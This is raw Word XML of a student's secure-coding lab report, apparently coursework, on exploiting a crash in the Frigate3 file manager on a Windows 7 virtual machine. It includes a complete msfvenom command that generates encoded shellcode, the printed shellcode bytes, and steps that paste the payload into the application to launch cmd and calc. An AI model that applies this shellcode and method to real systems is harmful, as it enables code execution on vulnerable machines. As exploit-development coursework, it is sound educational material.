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B9B51" w14:textId="74A05680" w:rsidR="00B621F3" w:rsidRDefault="00B621F3" w:rsidP="00604BEE">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="462369C8" w14:textId="7A765BA1" w:rsidR="00604BEE" w:rsidRDefault="00604BEE" w:rsidP="00604BEE">
      <w:pPr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Secure Coding Lab – </w:t>
      </w:r>
      <w:r w:rsidR="00403EFF">
        <w:rPr>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE85815" w14:textId="051CC60E" w:rsidR="00604BEE" w:rsidRDefault="00604BEE" w:rsidP="00604BEE">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BE6BAC9" w14:textId="1D989799" w:rsidR="00604BEE" w:rsidRDefault="00604BEE" w:rsidP="00604BEE">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01FC959D" w14:textId="52045105" w:rsidR="00604BEE" w:rsidRDefault="00604BEE" w:rsidP="00604BEE">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AA51460" w14:textId="7A0B4C09" w:rsidR="00604BEE" w:rsidRDefault="00604BEE" w:rsidP="00604BEE">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E70F912" w14:textId="6F0FEE7E" w:rsidR="00604BEE" w:rsidRDefault="00604BEE" w:rsidP="00604BEE">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="513D5880" w14:textId="397902BD" w:rsidR="00604BEE" w:rsidRDefault="00604BEE" w:rsidP="00604BEE">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="726AD723" w14:textId="24F34D8F" w:rsidR="00604BEE" w:rsidRDefault="00604BEE" w:rsidP="00604BEE">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t>Dasari Mohan Amritesh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB9D27A" w14:textId="04EA574F" w:rsidR="00604BEE" w:rsidRDefault="00604BEE" w:rsidP="00604BEE">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t>18BCN7038</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D242F4B" w14:textId="60370F8F" w:rsidR="00604BEE" w:rsidRDefault="00604BEE" w:rsidP="00604BEE">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B5CCD72" w14:textId="724268DA" w:rsidR="00604BEE" w:rsidRDefault="00604BEE" w:rsidP="00604BEE">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78BD563F" w14:textId="12A2B430" w:rsidR="00604BEE" w:rsidRDefault="00604BEE" w:rsidP="00604BEE">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06E74E50" w14:textId="72B4015E" w:rsidR="00604BEE" w:rsidRDefault="00604BEE" w:rsidP="00604BEE">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C99DE3A" w14:textId="393A1ACF" w:rsidR="00744064" w:rsidRDefault="00744064" w:rsidP="00744064">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E022551" w14:textId="67980129" w:rsidR="00A4095B" w:rsidRDefault="006F6111" w:rsidP="006A3C3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Install </w:t>
      </w:r>
      <w:r w:rsidR="00DC0845">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Frigate3 on Windows 7 VM</w:t>
      </w:r>
      <w:r w:rsidR="00A4095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3676892" w14:textId="278065AC" w:rsidR="006F6111" w:rsidRDefault="00DC0845" w:rsidP="00A4095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Frigate3 UI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140AAE4B" w14:textId="4C30ACC7" w:rsidR="006F6111" w:rsidRDefault="00DC0845" w:rsidP="0074406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C084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2613579" wp14:editId="0D53F87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072C" w14:textId="77777777" w:rsidR="006F6111" w:rsidRDefault="006F6111" w:rsidP="0074406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D676F4" w14:textId="35C14123" w:rsidR="006A3C3A" w:rsidRDefault="00DC0845" w:rsidP="00744064">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr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Execute the exploit2.py to generate the payload_cmd.txt file</w:t>
      </w:r>
      <w:r w:rsidR="006A3C3A" w:rsidRPr="00A4095B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47447E88" w14:textId="0C19ACDA" w:rsidR="00A4095B" w:rsidRDefault="00DC0845" w:rsidP="00A4095B">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC0845">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5008D640" wp14:editId="07AB2237">
            <wp:extent cx="5951220" cy="334565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5579" cy="339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EB40" w14:textId="05A6F6B5" w:rsidR="00A4095B" w:rsidRDefault="00DC0845" w:rsidP="00744064">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC0845">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="715337AC" wp14:editId="24F6969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4336" w14:textId="572DE515" w:rsidR="003B7CAE" w:rsidRDefault="00DC0845" w:rsidP="0074406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Copy the payload and open the frigate software, Go to disks and select find computer and paste the payload in it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BA484C" w14:textId="03745425" w:rsidR="00DC0845" w:rsidRDefault="00DC0845" w:rsidP="00744064">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20CCBC53" w14:textId="2F57F44A" w:rsidR="00DC0845" w:rsidRDefault="00DC0845" w:rsidP="00744064">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC0845">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C4376E6" wp14:editId="21E853E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4E47" w14:textId="68E67B82" w:rsidR="003B7CAE" w:rsidRDefault="003B7CAE" w:rsidP="00744064">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D1D20D6" w14:textId="1181A031" w:rsidR="00DC0845" w:rsidRDefault="00DC0845" w:rsidP="00744064">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="449E3A44" w14:textId="0241CADD" w:rsidR="00A4095B" w:rsidRDefault="00DC0845" w:rsidP="00744064">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC0845">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="499C4698" wp14:editId="609AAF7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284C" w14:textId="64428EC4" w:rsidR="00DC0845" w:rsidRDefault="00DC0845" w:rsidP="0074406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The application crashes and CMD opens up after pressing Ok.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686BE85E" w14:textId="0EBE3EF6" w:rsidR="00DC0845" w:rsidRDefault="00DC0845" w:rsidP="00744064">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33820A8E" w14:textId="57BE7C6D" w:rsidR="00DC0845" w:rsidRDefault="00DC0845" w:rsidP="0074406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Open linux on VMBox and in terminal paste the following code to get the calc payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14FFFED4" w14:textId="35F1BD6D" w:rsidR="00DC0845" w:rsidRDefault="00DC0845" w:rsidP="00DC084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DC0845">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t># msfvenom -a x86 --platform windows -p windows/exec CMD=calc -e x86/alpha_mixed -b "\x00\x14\x09\x0a\x0d" -f python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15FCD238" w14:textId="1F197D19" w:rsidR="00DC0845" w:rsidRDefault="00DC0845" w:rsidP="00DC084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2FE0D7E3" w14:textId="06609805" w:rsidR="00DC0845" w:rsidRDefault="00DC0845" w:rsidP="00DC084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This will generate the bit code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B4B555" w14:textId="77983020" w:rsidR="00801FAE" w:rsidRDefault="00801FAE" w:rsidP="00DC084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801FAE">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>buf = ""</w:t>
      </w:r>
      <w:r w:rsidRPr="00801FAE">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>buf += "\xbf\xe3\xfa\x7b\x97\xdb\xd5\xd9\x74\x24\xf4\x5d\x2b"</w:t>
      </w:r>
      <w:r w:rsidRPr="00801FAE">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>buf += "\xc9\xb1\x30\x83\xed\xfc\x31\x7d\x0f\x03\x7d\xec\x18"</w:t>
      </w:r>
      <w:r w:rsidRPr="00801FAE">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>buf += "\x8e\x6b\x1a\x5e\x71\x94\xda\x3f\xfb\x71\xeb\x7f\x9f"</w:t>
      </w:r>
      <w:r w:rsidRPr="00801FAE">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>buf += "\xf2\x5b\xb0\xeb\x57\x57\x3b\xb9\x43\xec\x49\x16\x63"</w:t>
      </w:r>
      <w:r w:rsidRPr="00801FAE">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>buf += "\x45\xe7\x40\x4a\x56\x54\xb0\xcd\xd4\xa7\xe5\x2d\xe5"</w:t>
      </w:r>
      <w:r w:rsidRPr="00801FAE">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>buf += "\x67\xf8\x2c\x22\x95\xf1\x7d\xfb\xd1\xa4\x91\x88\xac"</w:t>
      </w:r>
      <w:r w:rsidRPr="00801FAE">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>buf += "\x74\x19\xc2\x21\xfd\xfe\x92\x40\x2c\x51\xa9\x1a\xee"</w:t>
      </w:r>
      <w:r w:rsidRPr="00801FAE">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>buf += "\x53\x7e\x17\xa7\x4b\x63\x12\x71\xe7\x57\xe8\x80\x21"</w:t>
      </w:r>
      <w:r w:rsidRPr="00801FAE">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>buf += "\xa6\x11\x2e\x0c\x07\xe0\x2e\x48\xaf\x1b\x45\xa0\xcc"</w:t>
      </w:r>
      <w:r w:rsidRPr="00801FAE">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>buf += "\xa6\x5e\x77\xaf\x7c\xea\x6c\x17\xf6\x4c\x49\xa6\xdb"</w:t>
      </w:r>
      <w:r w:rsidRPr="00801FAE">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>buf += "\x0b\x1a\xa4\x90\x58\x44\xa8\x27\x8c\xfe\xd4\xac\x33"</w:t>
      </w:r>
      <w:r w:rsidRPr="00801FAE">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>buf += "\xd1\x5d\xf6\x17\xf5\x06\xac\x36\xac\xe2\x03\x46\xae"</w:t>
      </w:r>
      <w:r w:rsidRPr="00801FAE">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>buf += "\x4d\xfb\xe2\xa4\x63\xe8\x9e\xe6\xe9\xef\x2d\x9d\x5f"</w:t>
      </w:r>
      <w:r w:rsidRPr="00801FAE">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>buf += "\xef\x2d\x9e\xcf\x98\x1c\x15\x80\xdf\xa0\xfc\xe5\x10"</w:t>
      </w:r>
      <w:r w:rsidRPr="00801FAE">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>buf += "\xeb\x5d\x4f\xb9\xb2\x37\xd2\xa4\x44\xe2\x10\xd1\xc6"</w:t>
      </w:r>
      <w:r w:rsidRPr="00801FAE">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>buf += "\x07\xe8\x26\xd6\x6d\xed\x63\x50\x9d\x9f\xfc\x35\xa1"</w:t>
      </w:r>
      <w:r w:rsidRPr="00801FAE">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>buf += "\x0c\xfc\x1f\xc2\xd3\x6e\xc3\x05"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247B3C5B" w14:textId="21016111" w:rsidR="00801FAE" w:rsidRDefault="00801FAE" w:rsidP="00DC084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lastRenderedPageBreak/>
        <w:t>Make a new python script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF59C6C" w14:textId="03E9163A" w:rsidR="00801FAE" w:rsidRDefault="00801FAE" w:rsidP="00DC084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801FAE">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E898B9A" wp14:editId="651C25F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69F7" w14:textId="1EE46087" w:rsidR="00801FAE" w:rsidRDefault="00801FAE" w:rsidP="00DC084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3A57E05B" w14:textId="79D22766" w:rsidR="00801FAE" w:rsidRDefault="00801FAE" w:rsidP="00DC084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Execute the python script to generate the payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3E6859" w14:textId="0443B0BC" w:rsidR="00801FAE" w:rsidRDefault="00801FAE" w:rsidP="00DC084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801FAE">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="54764950" wp14:editId="3716E45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D3D2" w14:textId="5853076C" w:rsidR="00801FAE" w:rsidRDefault="00801FAE" w:rsidP="00DC084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04509414" w14:textId="1C4F9109" w:rsidR="00801FAE" w:rsidRPr="00DC0845" w:rsidRDefault="00801FAE" w:rsidP="00DC084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Do the same process as we did for exploit_cmd, but this time, after the application crashes it opens calculator.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EDB4AD" w14:textId="1F8AEEF5" w:rsidR="003A25BF" w:rsidRDefault="003A25BF" w:rsidP="0074406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FFDDE15" w14:textId="544C84F1" w:rsidR="00801FAE" w:rsidRDefault="00801FAE" w:rsidP="00744064">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00801FAE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3BA0FAFC" wp14:editId="4C9A3E1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FF2C" w14:textId="5E37B321" w:rsidR="00801FAE" w:rsidRPr="00F06028" w:rsidRDefault="00801FAE" w:rsidP="00744064">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00801FAE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19DFCE8F" wp14:editId="7892C5BD">
            <wp:extent cx="5943600" cy="3362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1FAE" w:rsidRPr="00F060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A86C2" w14:textId="77777777" w:rsidR="000D74A1" w:rsidRDefault="000D74A1" w:rsidP="00D30045">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="701D18C2" w14:textId="77777777" w:rsidR="000D74A1" w:rsidRDefault="000D74A1" w:rsidP="00D300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5AFD1" w14:textId="77777777" w:rsidR="000D74A1" w:rsidRDefault="000D74A1" w:rsidP="00D30045">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="58A5E90D" w14:textId="77777777" w:rsidR="000D74A1" w:rsidRDefault="000D74A1" w:rsidP="00D300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EF0189"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="04F2F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BEE"/>
    <w:rsid w:val="000D74A1"/>
    <w:rsid w:val="001438DE"/>
    <w:rsid w:val="00277BD4"/>
    <w:rsid w:val="003A25BF"/>
    <w:rsid w:val="003B7CAE"/>
    <w:rsid w:val="00403EFF"/>
    <w:rsid w:val="0041708A"/>
    <w:rsid w:val="0043342F"/>
    <w:rsid w:val="00563C1A"/>
    <w:rsid w:val="00604BEE"/>
    <w:rsid w:val="00644C65"/>
    <w:rsid w:val="006A3C3A"/>
    <w:rsid w:val="006F6111"/>
    <w:rsid w:val="00744064"/>
    <w:rsid w:val="00801FAE"/>
    <w:rsid w:val="009E3999"/>
    <w:rsid w:val="00A4095B"/>
    <w:rsid w:val="00AF600B"/>
    <w:rsid w:val="00B621F3"/>
    <w:rsid w:val="00B8772C"/>
    <w:rsid w:val="00D30045"/>
    <w:rsid w:val="00DA0745"/>
    <w:rsid w:val="00DC0845"/>
    <w:rsid w:val="00F06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B77FC"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{DDCAD51D-3A0B-4F16-80F0-4FB9AEA32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06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300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0045"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D300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00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8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2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1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0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274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Amritesh Dasari</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Amritesh Dasari</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <cp:lastPrinted>2021-02-20T12:06:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-04-19T04:11:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-04-19T04:34:00Z</dcterms:modified>
</cp:coreProperties>
</file>